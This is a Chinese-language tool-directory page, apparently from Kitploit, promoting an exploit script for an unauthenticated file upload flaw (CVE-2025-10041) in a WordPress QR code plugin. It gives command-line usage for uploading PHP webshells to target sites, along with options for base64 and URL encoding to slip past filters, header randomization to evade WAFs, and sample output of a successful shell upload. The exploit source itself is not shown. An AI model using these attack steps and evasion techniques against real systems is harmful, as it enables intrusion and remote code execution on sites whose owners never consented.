Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/nxploited/cve-2025-10041
Payload生成漏洞分析漏洞利用IDS/IPS规避Web应用程序漏洞利用WAF绕过
GitHubnxploited/cve-2025-10041

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - 未经身份验证的任意文件上传

查看仓库
3411个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - 未认证的任意文件上传

🚨 Flex QR Code Generator ≤ 1.2.5 - 未认证的任意文件上传


📝 描述

WordPress 的 Flex QR Code Generator 插件在 save_qr_code_to_db() 函数中缺少文件类型验证,因此容易受到任意文件上传攻击,影响所有版本(包括 1.2.5 及更早版本)。
这允许未认证的攻击者将恶意文件上传到受影响站点的服务器,从而可能导致远程代码执行。

  • CVE: CVE-2025-10041
  • CVSS: 9.8 (严重)

💡 关于此脚本

CVE-2025-10041.py 是一款专业的漏洞利用工具,旨在利用此漏洞自动化攻击过程。
它提供了用于绕过常见防护和编码技术的高级功能。


⚙️ 功能特性

  • 自动漏洞检测(版本检查)
  • 任意文件上传(包括 PHP WebShell)
  • 文件名编码绕过:Base64 或 URL 编码
  • 内容编码绕过:用于 Shell 代码的 PHP base64 包装器
  • 随机化 HTTP 头以规避基础 WAF
  • 自定义请求头支持
  • 完整的命令行界面,包含参数解析和帮助信息

🖥️ 使用方法

1. 基础利用

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com

2. Shell 文件名编码

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url

3. Shell 内容编码

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64

4. 自定义 Shell 文件名

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php

5. 高级用法(组合选项)

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php

6. 自定义请求头

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"

🆘 帮助

查看所有可用选项和使用说明:

root@kitploit:~
python3 CVE-2025-10041.py --help

🔓 绕过技术

  • 文件名编码:某些服务器会阻止 .php 或可疑文件名;编码可能绕过过滤器。
  • 内容编码:将 Shell 代码包装在 eval(base64_decode(...)) 中可能绕过内容过滤器。
  • 随机请求头:轮换 user-agent、referer 和 cookies 以避免检测。
  • 自定义请求头:添加自己的请求头以实现高级规避。

📋 输出示例

root@kitploit:~
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}

⚠️ 免责声明

此脚本仅用于教育、研究和经授权的渗透测试目的。
对您不拥有或未经明确许可测试的系统进行未经授权的使用是严格禁止且违法的。
作者不对任何滥用或由此工具造成的损害负责。


✍️ 作者:

Nxploited (Khaled Alenazi)


下载工具